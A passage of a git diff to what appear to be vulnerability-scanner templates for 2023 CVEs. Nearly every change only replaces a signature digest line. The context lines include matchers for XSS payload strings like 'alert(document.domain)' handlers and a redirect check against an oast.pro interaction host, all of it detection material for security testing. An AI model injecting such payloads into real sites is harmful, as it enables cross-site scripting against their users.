4b0a00483046022100ae345b4c4d22630c22cae557512e13efc50c87e8f5dd92a14d43dc5257e7195a022100de9f00585c0569847b1d33c1b54fc927b64a87cc74628be95b5b8e6d481148c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 767a37a8e4..d9d1296b5c 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022011946124fbea3060b12083c32b17e0b186d569285211bd151af520aa2049863b022025d018ea56be5d457807d28f19c35e6f7ceb58f7c4dd0da58f5e1c2b199ba60f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204e8b1f0d33fc4402e59216926eb5baaa7b5a70deb0b7b6d7d21a5a4594fb892602203bed43182ad8fa1763568b69cd18441c29d2eceb430846fbfd29aa1adffdd43f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index b8fa7992f6..fe3fb6ed65 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c2e4ccbc5b2c8c1c4f5d30c15228a94a1221974b2d3d8d5c49b3f12939165260022100bbd646ab5efc3bc871fb0405f472c61a7a1a5886c247ba112048e48f87c2c3ba:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f6b5678fdae5986835b56d28803f6619fbd18a1ed72f01f9f443ab96fd2181d9022100da2905d6691c2df5b06ee1e8063878ed48448058726ba7a621835d4dd7881cb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index ccb6759901..5d05ccc053 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -47,5 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "pagination\":")' condition: and - -# digest: 490a004630440220032dfd4f13ea0c0c938f3535eb9a5325b562d3e15ae73a75a47d38cc42a9c751022012eda7f8ffa504a6e00463b2acc26f8805e139d3ed099f5989b399d812c6acb0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008df0ecd11b8701d9c981098ee47ba3212d4bc45aa36b08a2c596bd921f7322e602204c3f10f61e6f811a31313997832185743945c2e767f6e50a6dd782d26a552219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index af6a06f91c..665a96fba3 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -44,5 +44,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and - -# digest: 4b0a00483046022100fce225abce9839fab938ed2d939ecafa5079b9a9a071a097ffae95ac3b3bdbce02210084a8dab37f73ec69088ce2bc85340871041d272d5a805cfd34698fbead37bea0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022077388e0bcf4c20543c42b5ac0ca7288c5e8c0fe9f7a9065adcda1d1775dbc2ec0221008d4285360da81622d639395a02bd0700b6661e9b3e3d8ea0b6ec6107dd937d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 6fc3d8c3b9..a40bb2553b 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -45,5 +45,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and - -# digest: 490a0046304402207f8a19869ac042dd349857520afc3d172a6a35e190687bb2c3b60b55c0691555022068a9315b3e7199b983bf82e0ba6d74a78198413bbd75f937d26cdcc830c140af:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d8d2229cf2c0e89fb70aa007545684ab63ee78d4d4acb7734aafce01a930a2302200470baefff2a0d61047549f9da422cdd0dfa312d6f8429ec6e7a35a07f2d4189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 55cc3d4a98..06b6d5dbf0 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -63,5 +63,4 @@ http: - Email - IsSiteAdmin condition: and - -# digest: 4a0a004730450221008f4ca8b7594046b5d88b7d16195779f7d53f45e87b190b19a486536f2bc5a43a02204dce01ec4697201bef3f19ca516bb9651dc786977b2fd8775433b4ebef614502:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a989d451d6959ff92e0dfb8383bf82435a9a7478fa8767c7fb87b3df6181669e022100d4fd6bdbec8ccac1e0e95d42058263f46daf68d665ae7e4033e6f28dffc2000c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index 8d25648ac7..ccf5539d6b 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b8a9a8ab7766e00d49bd3ffc04f2e24e629009dac4a1f8558428c5b2eb46e04802201d03bb191118e392ebac3d0ff0c058fe185d48e9df5e2862fc9de1e3e8e79619:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d201ab7d0a953e4c0b81bd884e040f378deb205b8512180af1fa13fb3c9b93260221009d5974e95fd3f3dcac683272272578bdd6e05b541738f8799e330880b3bf04e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 3cccdd0206..49c8006f41 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 400 - -# digest: 4a0a00473045022016a45c66739b4d914846bd8a9416073dd9e13afa4271a956a5aad41ac48ccd99022100f4de167ae2f4b1f7ddc02d2e552f3581c4a45c6a27d07292d22b25107ce242bf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc962704261ae7ba1a47b51f3b13bdf39f4f44c2cf91d84454a9ab92d96b49cc022100a00c313efb665d1d19bcad8b3ae6416d7c99be4f3a5b5ddb127699343b3930d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 8bd4a770d8..fcadf5ab70 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -45,5 +45,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect")' condition: and - -# digest: 4a0a0047304502206900ddb97671352ebf59521e0e5e327297cd1a1ca8578c05a4491966631c3813022100e6b78cffbfd4a92017756b3d72f478737ca124cbd8ff70956d1daf3fc86b9b54:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dcd6bb553e70520ca9dda61a95740b0aa60272762aa25f6af812d851a777feb4022100e0cebaa33b5e0a10e4d94255a80f93a608bd6c54713d4ed774eeeac993581df2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index ade7e8b813..f6d9f85a15 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c59598c31673c751e972c90d7120b5c56fd57858cfd9908637706cfe88c0c4f2022041397350b02637b414d7a6033fd618b8cb63d22de786aa0dda89ab27c8a4ebcb:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220401724bae9748601491cccd6a5395d3f1848091a86e024df5235dea98d15ebe002205833af3fc6b714ef5313decff8436ff14e4d898e28d614efa0f1235018846ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 65837a003d..bfdf9ec5df 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 302 - -# digest: 4a0a0047304502204810c2e31f9e9415c421c634128934b827d59516c2fc6dbb97b2d758044b8011022100d6717b823bc255aa2cf6c37c2b31a10041a7c02980a2f019ce7bd63f6090abc7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e1553aaaa0f7c05d60aea136f0589c4389123db239283adb401d5524e31bb51c022100831401c8535b66f5fe552b69b89ab5e5f38daf50d94d49b5eec4787953633b07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index af3c1f786e..fe689a3fcb 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201747db92d5d63615e5e7656f2713cde7f278fc540421929bb36a4b44097dfac302207152a0850f4b066cd9dde81d4658a4a975b9f22af6911ec5681d63ee8a26aeb1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c7d3607eefd41187055f82aa5df01bf245f65908456f76a549b7caeb9915ec69022100d8c89da9cf3ac477ee26d50441510de514b0312f46f3e96e56919d4270c9d3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 6e8d71521e..857d64741f 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e857e50953b71c5d6de9abdf3acaa5ad9c9c7bea44ac139d6c2c948b85101ccc02200ba2e730cf2d93a6692516660974831bb269f71bf9e730508b4a557d949350da:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bcdaa03f0d3753a24e1930952e14e6716d6bedce6a05c6ca6531eca1b436967d022100b06587d5f487534ae61c65be6163260ccb9f9d6dce84e18bd69f7b3eb7a9088d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index dfd2217ddc..4206577a08 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207a543c0d03809f70dd18cae73e10920ad2881821f3e92050d0b151e63bc16184022042329a39bf966b22cb3d6e6d8790bc1969d3491e6af89c299d118de0353bb9ad:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204eeff9a867e67592ead7ebfcfb9b69e459754d515bddb9d44fbe685a4edd9d6502205cbec0e246efe88ff7149df056616f72c9134e9ca8a371d04ba99b397abf5e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 843a9803bf..c5d0775435 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dd33aac8e153667ab084d5d44af29325c03883a375fb8a61dac0fedbd8c6bbf4022100ff4df4a089a908353cca5977242c7f13ea485bcf8a65d7b9009d2a3731c6cc88:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a144b886ec1b3a2b3bfbdab97e81256712e1f97eb8562536309264f7b8927c3e022100c2574094aa0ed99399a793006eaf9c32f2c5aead14409bf6102c8e3b03b977ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index f656ce5f6b..74bc34efeb 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100941ba93457bc487924b711fac2088c2693a52b8e67bb0f457a6f6556b67ce8b8022100c4bdd384c28f71940c56aece68ae6aac73a98b509f6bfa2185b683459c0c0494:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022032613b13357ac374c17f422fd546f51cc32f6578f23ffd74cd3d11500db07822022100b7aa7bd5bd54d902f9b8903424cd8ae06333f741c52b64b45775765c81056742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 25f5223cb3..3a8c704ca5 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 422 - -# digest: 4a0a00473045022100f7cedab12bfe449db9a08ee87b240ed143a62777cefa0e95accfcd537b6bb38402202b6fbd46685f94f4d381adc965db29582b8f7d8e46c38e13a278ff9ecf16c087:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210088cc28dd9eaf1108cd6bef8a316d8ed85ae47e15785f94cf531578802345d501022100f85f84c071781f1ce4513af01c55579e31bd637120cffa2617e925cf11fbc434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 83231763ab..d15b9a7661 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -45,5 +45,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and - -# digest: 4a0a0047304502205abcede177c6111931106c311f2728601d061e709842eb150dbba8375fb15a24022100b30a8793c0534e45eac6b51032438546ea5bdd0059743dd0159ee81fbb168a8e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a73522b415575e2d92fc85b92ff29cf2bfb6e2fe4b9710933659fe255408bd0d0221009a0c3631fffd58e460bb20f8c3eb1f885d4a00047a62db6de178c01bc6ee6922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index a7a4146012..70a6efa644 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220182c1a36e4d939b10c3e1019a77f0c412abc2a96e42ba782eb30a46f42edc42b0221009df7f778bc9eaf42faaa16c75583e8790d1bb8a24926ba2d5f681397a15b1d88:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220147fa64c07c3a48959a97df0f5be4496ca2fd51af172d816abf906e7d95fa420022100fe2359dd8316c8503a5434fbfbcfe6a3eeee78f75c235a817729d56be57c52d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index e87d282fef..71608d81f8 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100eaf54c1fd76b8a6885a0341e1b88438477af4e23ce2b4ac7e647859119b02658022100a456647d8ead548fd3a34403fdff15082aabbcb5729daab9eb2b9e2c7705205b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201131a9f099e836eab82f9a1800b523d82bdc1d17b4f28b7b26ad56445a9fb0c2022100bc6c952fbf9bfdbda077834a38a92bb62a0784de8e89220898a5388b3cf6733f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index a7419b09bf..4597f92a7a 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022020e1771afddc068748d7b7e4191992a2c1c869870540d4cc82b814a3124d26df022100bc9cdd0ac04d2e0f6aae152610cdaa2778c1096b4202fe06530bc01ee8939002:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220109978a75086d34fd68d46cd53a43da32ab484f4048a92976924c3bfbfa2382d0220391b9a118a8136381b777cfdd7a838b86f28a07592774e8b8983cbd00ef5d1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index e621e246f7..0434bdb041 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 500 - -# digest: 4a0a00473045022100896b33a042722eb08f5673325d7916a3132acdbf6e17934726613db1e54a389802205d13106b697f85f5e456d9ac860b48475899ffb4a39aaf3995b23b877e064451:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009be27467ec56a36206a238225b1a47d64192e656c11b59b6f6f7871f79e60461022018c51dce15aa2da486ae3ea0f1192e028f92c3d04c53d4d9bc0fcfb1cf0d3dd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 04a2115930..1420df00aa 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Advanced Custom Fields")' condition: and - -# digest: 4b0a004830460221008e90c60a94d65325f45c0406513ebd955e4bec1f56c3ee19c528a95e482120ec022100960a2dd2ec6ccec55de6cfa0688e89a2eb93dee0eccd603848ad22c9a358ae2c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9c95ebba657f67f7c32f87245f8333561849876acc867dd45637cc18a9cb63a022100d3e2352a4337b12b528b6bb0e5806ba0cd40f3f171a90e37a845f6d089d4c76a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index 614978a2bc..c77fd6d009 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' - 'status_code_2 == 200' condition: and - -# digest: 4b0a004830460221008b5db2d73d3378ef8e56fa3c1c84b9fa68ab350943d3168e543e184fdd114f79022100f0c340152c849559307e7d07cd1a7f154c62e3ea831d1d27730f7cecee1548e8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e5c462a564686d33c522c8cf2073731564327448bf0969cea84f2427b6fe236f022066bf8cee1ff45c730c80a69ab9b8a2d04fe64ac078d3a85a9f23333c18c2868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index e5e2162cad..90832394e2 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -77,5 +77,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true - -# digest: 490a0046304402201c35a86e7dec9b659f650d6052865dc47ee62ea89c9b54f09ee26d70980a42fb02206fe8b82958eb4a2cd59c974771c571f431d4df2fb5d82fe57696ed4fe86e896b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202c184aa4c6778987d5ab160ae9850e38f26810cb398827a0dab31f0487c7e0e902200b9bee37aef02d811c7ba4863f972935848c51a4a205b64e6fb0895d73735a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 3c4c46998b..e80972c0bd 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008c60580550b5f7e21f98aca6192f631567af77f2f65b5b3316cec9c23b541e00022002b6ec6f857ba15dd5ff01b9f63703a208d76823c8d128af218c99b84dc7f885:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c08c10f1c1254e4862b8ab5f2c462ada78f9b7a0423104df7f1e818da6ea80a1022072ca32dc81dc1963ca6ae1961a518a5541171a105f80533e60a44a286f049057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index b5c74bc107..0ace6d6ffd 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -41,5 +41,4 @@ http: part: body words: - '{"seriesID":' - -# digest: 4b0a004830460221008c9e5304fd13426b0d3ec879101dfb34afe3360130afa5dad3f9094d527c2a9d022100f33579b58602e2199a6b24f8d51f207e8d30cb468978425f112bdb53c1adf78c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022010b121a97e2b593438373503908149d31586c0452d24e629076c91628c3ff4e3022100f10d8a562d13d3e8aca6a9c6ec411fde725d733d2cfac00519d1157c491eb682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 56e74fe437..ab6e722dbd 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -51,5 +51,4 @@ http: - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\">")' - 'contains(body_2, "ChurchCRM")' condition: and - -# digest: 4b0a0048304602210098436258d007c7c44e33bc95b5692e42566070381329f9330bf4bcc99aa05349022100cdf2bc35a99790f8cbe676d8101793cfc07563a2ff3aeadb4827d2c5743ac74d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220507082b4e549b2d4057d80092fdb9e2cfc68fcfebc85881babc6d352e318dd7802207ea10c01b79b3537ed34417c71e369ad923e38c39958895b34c71bbc92643a3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 980996c8bc..16b03b39d9 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206516a324e390a143da60a41a4418a20e2a35733a8cea008084d35dca0ce36002022034d7f65d845eb82e2d9cf5c2a3b0c037007ca2edd614f99c3c5e1e6f68de3cfe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f91b2e3a920ca9af4ffa87ec4984b35964f0b3bfd25b8e0f4bf06d6469d4ecd022100d1adc91d7ed00fec0985ad113a0cb92d46c8ae756d8039a2d90201bb9aefc4a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 2360c29415..bee8d3fdfd 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f5e91583b9bfceaec4dafd0f7e24735be51a14b6d69a12a483f94a9c3d07224902201dfbd4384f0c98923d2e90fb20e13dc6c04849ff0053b8c425f49fecdee3d7a7:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022056929f4c18a7f717bcdf3227ba4870d3556ea8416dda83a482895231067fcb4c0220115a3e516f8d7185b697bd36f881ada00ce09572769608d0888d1233f273aedb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 53703e7a64..eda0e3d004 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -102,5 +102,4 @@ http: regex: - '\/author\/([a-z-]+)\/' internal: true - -# digest: 4a0a00473045022100cb594afff348bf612d82ad70e113e55cc09c6b0adfc55df5dc64c60b8128b4c202202bcb407320930d8eca91cec7452ced441974e885aeecb09171b828de8dd14cb5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022053ba78e4069acf2f4064bfe4bab36d9866d5c281164f869a3aa012b39244ae9402210089dca9d32f4cb882005c4bb6497aa4c9a88182dc83911b66788b72295694a186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 50303ac009..ae6320a707 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -54,5 +54,4 @@ http: part: body_2 words: - "CVE-2023-32563" - -# digest: 4b0a00483046022100953d8c330341d5fa2727e6e40c2b95819fcbbeb9fae2780b8f489281c83b3d830221008914f8a90438a0821bca9491556f092460dffd103df9338639bd55995c04c4fc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f7037326895c298b4f1ee868a82c96bfe9c4e6d48d53855f1a4eccb49d0ebcd022013deb0737f673bd1c44976ec34c8decb93896d3a51210e0092b00ad110d7ae31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 265c2d2b57..4cbd6d81f7 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and - -# digest: 490a00463044022030c105dcc691ea0d3cbb7b6c9232cce374341460f8f183985a579143091b3075022019dcde9c743a602c620941b5fa76de1c08d8fda401894f2e08820dc16a872342:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009216fcad39ce65f4875290f39133a916198566411e5a1e303da2d157170cd171022100cd03e6566931bd22e51b120d608a8cc7c36e2b6772bcd47352b50866161412f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 44d2aa2b52..f641a6e0f7 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -36,5 +36,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header - -# digest: 4b0a0048304602210097f151adaaf93f9bc4ee09b7161efb70e18157f680e6c44c2b91f278d2723afe022100a5499cb62f634a6c5731c11a6a5a5f88d03ea89bc9f53931f69d94e54cb8bd2f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022064582b2631f23388e8bcf8fec18068e0f3dce697570ad0fbe05935bf7c1949d4022100e4a765c549f0bca911e4a495e62a6accfb30ab76e287c1f449072cf266dc06dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 99601cb895..0084c83171 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -47,5 +47,4 @@ http: - 'contains(body, "Fatal error:")' - 'contains(body, "XPATH syntax error:")' condition: and - -# digest: 4b0a00483046022100bb37b7667017ddcb1c85bd1c6c5e2b939edb2348779182a72edb7c96356b758b0221008c3670de7c7b18d82fc48b939c93b458034e4bbb5d95ae441eee076910719b64:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b43f339320db69b7428f3965af4fd4c4533665dc524c372d2ccb098edb86f541022020c9968be5a8c6a6956b8e4affdeb30a26ffd1c2e14cf6cf11b3c685941163cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index dcba23d3cf..9e77f5797b 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -80,5 +80,4 @@ http: - 'len(body_1) == 1' - 'contains(body_2, "Faculty Evaluation")' condition: and - -# digest: 490a004630440220426309a86ddb19ff80ad8159a18ce93a2614e22577f8fe8243344788cc3cfc8102200d89914b483097f7870d3ff286322631e4a292cb62e8380c796e68156aa7ea40:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204e8e753e484c87cef0f0e2b09cbb53b42504c39b02088c3e0d4149a7615602d902207de3228faf315d4135de5019b044483ea3876fa241f0fb3d08b4ac1008152b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 1a82223a6c..55997312e3 100644 --- 